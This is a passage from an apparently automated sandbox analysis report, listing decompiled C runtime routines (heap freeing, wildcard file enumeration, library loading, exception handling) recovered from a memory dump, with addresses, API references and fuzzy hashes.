0x00000000
0x001ae130
0x001ae128
0x001ae133

APIs

_free.LIBCMT ref: 001AE0E3

Part of subcall function 001A71B2: HeapFree.KERNEL32(00000000,00000000,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?), ref: 001A71C8
Part of subcall function 001A71B2: GetLastError.KERNEL32(?,?,001AE36C,?,00000000,?,?,?,001AE60F,?,00000007,?,?,001AEB02,?,?), ref: 001A71DA

_free.LIBCMT ref: 001AE0F5
_free.LIBCMT ref: 001AE107
_free.LIBCMT ref: 001AE119
_free.LIBCMT ref: 001AE12B

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2d6199916d2ee6f3c7af4d64a89330dc1a794b8a5d6dfb7f67decb11623f30f6
Instruction ID: 6e622375e3ce36d06665b1d0b427bfb025682047216c43a6a937de44df3df7a7
Opcode Fuzzy Hash: 2d6199916d2ee6f3c7af4d64a89330dc1a794b8a5d6dfb7f67decb11623f30f6
Instruction Fuzzy Hash: FFF0363B608210AB8630DB68FD86C6A77EAAB427107648805F458D7A41CB34FDD08A64

Uniqueness

Uniqueness Score: -1.00%

Function 001AC61C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E001AC61C(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E001A2D2F(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E001B1799(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E001A016C();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E001A58A2(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E001B1799(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E001ACB4F(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E001A71B2(_t300);
														_t302 = _v12;
													}
													E001A71B2(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E001B1799(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E001A016C();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x1c3014; // 0x88921fa2
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E001B1EA0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E001A27BB(_t244 - _t287 + 1, _t287,  &_v676, E001AC3AB(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E001AC54D( &(_v608.cFileName),  &_v640,  &_v609, E001AC3AB(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E001A71B2(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E001A71B2(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E001B1970(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E001AC535);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E001A71B2(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E00197F14(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E001A71B2(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E001B1E60(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E001A71B2( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E001A71B2(_t283);
						goto L31;
					}
				} else {
					_t219 = E0019FD24(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E001A013F();
					L31:
					return _t297;
				}
				L81:
			}

0x001ac621
0x001ac624
0x001ac627
0x001ac628
0x001ac62a
0x001ac640
0x001ac644
0x001ac647
0x001ac649
0x001ac64b
0x001ac64d
0x001ac64f
0x001ac652
0x001ac655
0x001ac658
0x001ac65a
0x001ac6bd
0x001ac6bf
0x001ac6c2
0x001ac6c4
0x001ac6c8
0x001ac6d1
0x001ac6d2
0x001ac6d5
0x001ac6d7
0x001ac6da
0x001ac6de
0x001ac6de
0x001ac6e0
0x001ac6e2
0x001ac6e4
0x001ac6e6
0x001ac6e6
0x001ac6e8
0x001ac6eb
0x001ac6ee
0x001ac6ee
0x001ac6f0
0x001ac6f1
0x001ac6f1
0x001ac6fc
0x001ac6fe
0x001ac701
0x001ac702
0x001ac705
0x001ac705
0x001ac709
0x001ac70c
0x001ac70f
0x001ac70f
0x001ac70f
0x001ac71c
0x001ac71e
0x001ac721
0x001ac723
0x001ac73b
0x001ac73e
0x001ac741
0x001ac743
0x001ac746
0x001ac748
0x001ac74b
0x001ac74e
0x001ac7ab
0x001ac7ae
0x001ac7b1
0x001ac7b3
0x00000000
0x001ac750
0x001ac752
0x001ac752
0x001ac754
0x001ac757
0x001ac757
0x001ac759
0x001ac75b
0x001ac761
0x001ac764
0x001ac764
0x001ac766
0x001ac767
0x001ac767
0x001ac76e
0x001ac771
0x001ac775
0x001ac782
0x001ac787
0x001ac78a
0x001ac78c
0x001ac800
0x001ac801
0x001ac802
0x001ac803
0x001ac804
0x001ac805
0x001ac80a
0x001ac80e
0x001ac810
0x001ac811
0x001ac814
0x001ac814
0x001ac817
0x001ac817
0x001ac819
0x001ac81a
0x001ac81a
0x001ac81e
0x001ac81f
0x001ac826
0x001ac829
0x001ac82c
0x001ac82e
0x001ac836
0x001ac837
0x001ac838
0x001ac83b
0x001ac845
0x001ac849
0x001ac84b
0x001ac85f
0x001ac85f
0x001ac862
0x001ac86c
0x001ac871
0x001ac874
0x001ac876
0x00000000
0x001ac878
0x001ac878
0x001ac87d
0x001ac884
0x001ac887
0x001ac889
0x001ac89a
0x001ac89c
0x001ac89e
0x001ac89e
0x001ac89e
0x001ac88b
0x001ac88c
0x001ac891
0x001ac894
0x001ac8a3
0x001ac8a9
0x00000000
0x001ac8ac
0x001ac84d
0x001ac84d
0x001ac853
0x001ac858
0x001ac85b
0x001ac85d
0x001ac8af
0x001ac8b1
0x001ac8b2
0x001ac8b3
0x001ac8b4
0x001ac8b5
0x001ac8b6
0x001ac8bb
0x001ac8be
0x001ac8bf
0x001ac8c1
0x001ac8c7
0x001ac8ce
0x001ac8d1
0x001ac8d4
0x001ac8d7
0x001ac8d8
0x001ac8d9
0x001ac8dc
0x001ac8e2
0x001ac8e4
0x001ac8e6
0x001ac8e6
0x001ac8e8
0x001ac8ea
0x00000000
0x00000000
0x001ac8ec
0x001ac8ee
0x001ac8f0
0x001ac8f2
0x001ac8fd
0x001ac8ff
0x001ac901
0x00000000
0x00000000
0x001ac901
0x001ac8f2
0x00000000
0x001ac8ee
0x001ac903
0x001ac903
0x001ac909
0x001ac90b
0x001ac911
0x001ac913
0x001ac935
0x001ac935
0x001ac937
0x001ac939
0x001ac945
0x001ac945
0x001ac93b
0x001ac93b
0x001ac93d
0x00000000
0x001ac93f
0x001ac93f
0x001ac941
0x001ac943
0x00000000
0x00000000
0x001ac943
0x001ac93d
0x001ac94d
0x001ac955
0x001ac95b
0x001ac95c
0x001ac95e
0x001ac966
0x001ac96c
0x001ac972
0x001ac978
0x001ac98c
0x001ac991
0x001ac99c
0x001ac9ac
0x001ac9b2
0x001ac9b4
0x001ac9b7
0x001ac9da
0x001ac9da
0x001ac9df
0x001ac9e5
0x001ac9e5
0x001ac9eb
0x001ac9f1
0x001ac9f7
0x001ac9fd
0x001aca03
0x001aca24
0x001aca29
0x001aca2e
0x001aca32
0x001aca38
0x001aca3b
0x001aca4e
0x001aca4e
0x001aca54
0x001aca5a
0x001aca5b
0x001aca5c
0x001aca61
0x001aca64
0x001aca6a
0x001aca6c
0x001acaca
0x001acad0
0x001acad8
0x001acadd
0x001acae3
0x001acae4
0x00000000
0x00000000
0x00000000
0x001aca3d
0x001aca3d
0x001aca40
0x001aca42
0x00000000
0x001aca44
0x001aca44
0x001aca47
0x00000000
0x001aca49
0x001aca49
0x001aca4c
0x00000000
0x00000000
0x00000000
0x00000000
0x001aca4c
0x001aca47
0x001aca42
0x001acae6
0x001acae7
0x00000000
0x001aca6e
0x001aca6e
0x001aca74
0x001aca7c
0x001aca81
0x001aca90
0x001aca90
0x001aca98
0x001aca9e
0x001acaa4
0x001acaab
0x001acaae
0x001acab0
0x001acac0
0x001acac5
0x00000000
0x001ac9b9
0x001ac9b9
0x001ac9bf
0x001ac9c0
0x001ac9c1
0x001ac9c2
0x001ac9ca
0x001ac9ca
0x001acaed
0x001acaed
0x001acaf4
0x001acaf5
0x001acafd
0x001acb02
0x001acb03
0x001ac915
0x001ac915
0x001ac918
0x001ac91a
0x001ac92f
0x00000000
0x001ac91c
0x001ac91c
0x001ac91f
0x001ac920
0x001ac921
0x001ac922
0x001ac927
0x001ac91a
0x001acb08
0x001acb09
0x001acb0b
0x001acb12
0x00000000
0x00000000
0x00000000
0x001ac85d
0x001ac830
0x001ac832
0x001ac833
0x001ac835
0x001ac835
0x00000000
0x00000000
0x00000000
0x00000000
0x001ac78e
0x001ac78e
0x001ac794
0x001ac797
0x001ac79a
0x001ac79d
0x001ac7a0
0x001ac7a3
0x001ac7a6
0x001ac7a6
0x00000000
0x001ac757
0x001ac725
0x001ac725
0x001ac728
0x001ac7b5
0x001ac7b6
0x001ac7bb
0x00000000
0x001ac7bb
0x001ac65c
0x001ac65c
0x001ac65f
0x001ac667
0x001ac66a
0x001ac671
0x001ac673
0x001ac675
0x001ac690
0x001ac691
0x001ac692
0x001ac693
0x001ac698
0x001ac69b
0x001ac69e
0x001ac677
0x001ac677
0x001ac67a
0x001ac67b
0x001ac67c
0x001ac67d
0x001ac67e
0x001ac683
0x001ac685
0x001ac688
0x001ac688
0x001ac6a0
0x001ac6a2
0x00000000
0x00000000
0x001ac6ab
0x001ac6ae
0x001ac6b1
0x001ac6b3
0x001ac6b5
0x00000000
0x001ac6b7
0x001ac6b7
0x001ac6ba
0x00000000
0x001ac6ba
0x00000000
0x001ac6b5
0x001ac730
0x001ac7bc
0x001ac7bf
0x001ac7c3
0x001ac7cc
0x001ac7cf
0x001ac7d3
0x001ac7d3
0x001ac7d5
0x001ac7d8
0x001ac7da
0x001ac7dc
0x001ac7de
0x001ac7e3
0x001ac7e4
0x001ac7e8
0x001ac7e8
0x001ac7ec
0x001ac7ef
0x001ac7ef
0x001ac7f3
0x00000000
0x001ac7fa
0x001ac62c
0x001ac62c
0x001ac633
0x001ac634
0x001ac636
0x001ac7fb
0x001ac7ff
0x001ac7ff
0x00000000

APIs

_free.LIBCMT ref: 001AC7B6

Strings

*?, xrefs: 001AC65F

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: c66b5f97caf254190b3924c3821d8b89329301fe7e6a64137efe767deee30958
Instruction ID: 327dc3e9eb98f60d6b8e58d1f86b24d8107581b0c93f1ec62464e0b0b7228063
Opcode Fuzzy Hash: c66b5f97caf254190b3924c3821d8b89329301fe7e6a64137efe767deee30958
Instruction Fuzzy Hash: 3B611DB9D002199FDB15CFA8C8815EDFBF5EF59310B25816AE815E7340E7359E418B90

Uniqueness

Uniqueness Score: -1.00%

Function 0019C382 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0019C382(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E001A5868(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x0019c38f
0x0019c397
0x0019c3cc
0x0019c399
0x0019c3a2
0x00000000
0x0019c3c9
0x0019c3c8
0x0019c3c8

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0019C333,00000000,?,001F09E4,?,?,?,0019C4D6,00000004,InitializeCriticalSectionEx,001B5BB0,InitializeCriticalSectionEx), ref: 0019C38F
GetLastError.KERNEL32(?,0019C333,00000000,?,001F09E4,?,?,?,0019C4D6,00000004,InitializeCriticalSectionEx,001B5BB0,InitializeCriticalSectionEx,00000000,?,0019C28D), ref: 0019C399
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0019C3C1

Strings

api-ms-, xrefs: 0019C3A6

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: f5ab36ddbe9af10c8324e2872eed03eeb3878e7a4a44fba785635e5580a73a73
Instruction ID: f69e9233e5b997c53aba87762702216c7bc410e905f38de13564b453995e9691
Opcode Fuzzy Hash: f5ab36ddbe9af10c8324e2872eed03eeb3878e7a4a44fba785635e5580a73a73
Instruction Fuzzy Hash: 26E04F35684304B7EF202B72EC06B9C3B59AB11B44F108020FF4CE84E1D7A1995089D4

Uniqueness

Uniqueness Score: -1.00%

Function 0019B351 Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E0019B351(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x1c2168);
				E001986F0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00198BD0(_t107, E001998EF(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00198BD0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x1f09b4; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x1b4134();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E001A24F9(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x1c2188);
									E001986F0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
